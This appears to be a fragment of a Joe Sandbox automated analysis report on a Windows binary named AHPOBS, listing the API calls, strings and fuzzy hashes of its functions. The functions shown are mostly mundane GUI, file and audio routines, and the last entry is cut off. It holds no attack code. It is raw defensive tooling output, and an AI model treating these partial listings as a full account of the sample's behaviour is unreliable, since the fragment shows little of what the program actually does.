                                      • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                      APIs
                                      • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                                      • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                                      • SendMessageW.USER32 ref: 00471740
                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                                      • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                                      • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                                      • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                                      • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                                      • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                                      • SendMessageW.USER32 ref: 0047184F
                                      • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                                      • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                                      • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                                      • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                                      • String ID:
                                      • API String ID: 4116747274-0
                                      • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                      • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                                      • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                      • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                                      APIs
                                      • GetDC.USER32(00000000), ref: 0043143E
                                      • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                      • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                      • SelectObject.GDI32(00000000,?), ref: 00431466
                                      • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                      • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                      • String ID: (
                                      • API String ID: 3300687185-3887548279
                                      • Opcode ID: f39f5f9ae481ec9d89b28e017500a91edb5d84f1e4edfe6a585574389a683a62
                                      • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                                      • Opcode Fuzzy Hash: f39f5f9ae481ec9d89b28e017500a91edb5d84f1e4edfe6a585574389a683a62
                                      • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                                      APIs
                                        • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                        • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                      • GetDriveTypeW.KERNEL32 ref: 0045DB32
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                      • API String ID: 1976180769-4113822522
                                      • Opcode ID: 0f6c8a3de1c9442f7f3474ab6782275dee6e5c09c811d69c53e3fb1fd536eda6
                                      • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                                      • Opcode Fuzzy Hash: 0f6c8a3de1c9442f7f3474ab6782275dee6e5c09c811d69c53e3fb1fd536eda6
                                      • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                      • String ID:
                                      • API String ID: 461458858-0
                                      • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                      • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                                      • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                      • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                      APIs
                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                      • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                      • GlobalLock.KERNEL32(00000000), ref: 004300F6
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                      • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                      • CloseHandle.KERNEL32(00000000), ref: 00430113
                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                      • GlobalFree.KERNEL32(00000000), ref: 00430150
                                      • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                      • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                      • DeleteObject.GDI32(?), ref: 004301D0
                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                      • String ID:
                                      • API String ID: 3969911579-0
                                      • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                      • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                      • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                      • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                                      • String ID: 0
                                      • API String ID: 956284711-4108050209
                                      • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                      • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                                      • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                      • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                                      APIs
                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: SendString$_memmove_wcslen
                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                      • API String ID: 369157077-1007645807
                                      • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                      • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                                      • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                      • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                                      APIs
                                      • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                      • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                      • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                      • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                      • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                      • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                                      • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                      • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                      Similarity
                                      • API ID: MessageSend$CharNext
                                      • String ID:
                                      • API String ID: 1350042424-0
                                      • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                      • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                                      • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                      • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                                      APIs
                                        • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                        • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                      • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                                      • _wcscpy.LIBCMT ref: 004787E5
                                      Strings
                                      Similarity
                                      • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                      • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                                      • API String ID: 3052893215-2127371420
                                      • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                      • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                                      • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                      • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                                      APIs
                                      • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                      • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                      • __swprintf.LIBCMT ref: 0045E7F7
                                      • _wprintf.LIBCMT ref: 0045E8B3
                                      • _wprintf.LIBCMT ref: 0045E8D7
                                      Strings
                                      Similarity
                                      • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                      • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                      • API String ID: 2295938435-2354261254
                                      • Opcode ID: 44e01960a33580a095bbf2e3e13559187395cafc70d58b6b713acd2f3f366ced
                                      • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                                      • Opcode Fuzzy Hash: 44e01960a33580a095bbf2e3e13559187395cafc70d58b6b713acd2f3f366ced
                                      • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: __swprintf_wcscpy$__i64tow__itow
                                      • String ID: %.15g$0x%p$False$True
                                      • API String ID: 3038501623-2263619337
                                      • Opcode ID: fbecec011642e75c0826342797bee3cec1de7bcd6151ffebb94b53bcc76576dd
                                      • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                                      • Opcode Fuzzy Hash: fbecec011642e75c0826342797bee3cec1de7bcd6151ffebb94b53bcc76576dd
                                      • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                                      APIs
                                      • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                      • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                      • __swprintf.LIBCMT ref: 0045E5F6
                                      • _wprintf.LIBCMT ref: 0045E6A3
                                      • _wprintf.LIBCMT ref: 0045E6C7
                                      Strings
                                      Similarity
                                      • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                      • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                      • API String ID: 2295938435-8599901
                                      • Opcode ID: 97ebc5a5c228c2a30bddf96a7da616a93a1f5c8b5e746e323a0bc296dbc3a2d1
                                      • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                                      • Opcode Fuzzy Hash: 97ebc5a5c228c2a30bddf96a7da616a93a1f5c8b5e746e323a0bc296dbc3a2d1
                                      • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                      • LoadStringW.USER32(00000000), ref: 00454040
                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                      • _wprintf.LIBCMT ref: 00454074
                                      • __swprintf.LIBCMT ref: 004540A3
                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                      Strings
                                      Similarity
                                      • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                      • API String ID: 455036304-4153970271
                                      • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                      • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                                      • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                      • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                                      APIs
                                      • GetDlgItem.USER32(?,00000001), ref: 004357DB
                                      • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                      • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                      • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                      • GetWindowRect.USER32(00000000,?), ref: 0043587C
                                      • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                      • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                      • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                      • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                      • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                      Similarity
                                      • API ID: Window$ItemMoveRect$Invalidate
                                      • String ID:
                                      • API String ID: 3096461208-0
                                      • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                      • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                                      • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                      • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                                      APIs
                                      • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                                      • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                                      • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                                      • DeleteObject.GDI32(?), ref: 0047151E
                                      • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                                      • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                                      • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                                      • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                                      • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                                      • DeleteObject.GDI32(?), ref: 004715EA
                                      • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                                      Similarity
                                      • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                                      • String ID:
                                      • API String ID: 3218148540-0
                                      • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                      • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                                      • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                      • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                                      APIs
                                      Similarity
                                      • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                      • String ID:
                                      • API String ID: 136442275-0
                                      • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                      • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                                      • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                      • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                                      APIs
                                      • _wcsncpy.LIBCMT ref: 00467490
                                      • _wcsncpy.LIBCMT ref: 004674BC
                                        • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                        • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                      • _wcstok.LIBCMT ref: 004674FF
                                        • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                      • _wcstok.LIBCMT ref: 004675B2
                                      • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                      • _wcslen.LIBCMT ref: 00467793
                                      • _wcscpy.LIBCMT ref: 00467641
                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                      • _wcslen.LIBCMT ref: 004677BD
                                      • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                        • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                      Strings
                                      Similarity
                                      • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                      • String ID: X
                                      • API String ID: 3104067586-3081909835
                                      • Opcode ID: 62a65fcb1b778ace7bccfcde0373576fcf6fca270e4bd93cb190aa4d41a6e3dd
                                      • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                                      • Opcode Fuzzy Hash: 62a65fcb1b778ace7bccfcde0373576fcf6fca270e4bd93cb190aa4d41a6e3dd
                                      • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                                      APIs
                                      • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                                      • _wcslen.LIBCMT ref: 004610A3
                                      • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                                      • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                                      • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                                      • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                                      • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                                      • GetWindowRect.USER32(?,?), ref: 00461248
                                        • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                                      • String ID: ThumbnailClass
                                      • API String ID: 4136854206-1241985126
                                      • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                      • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
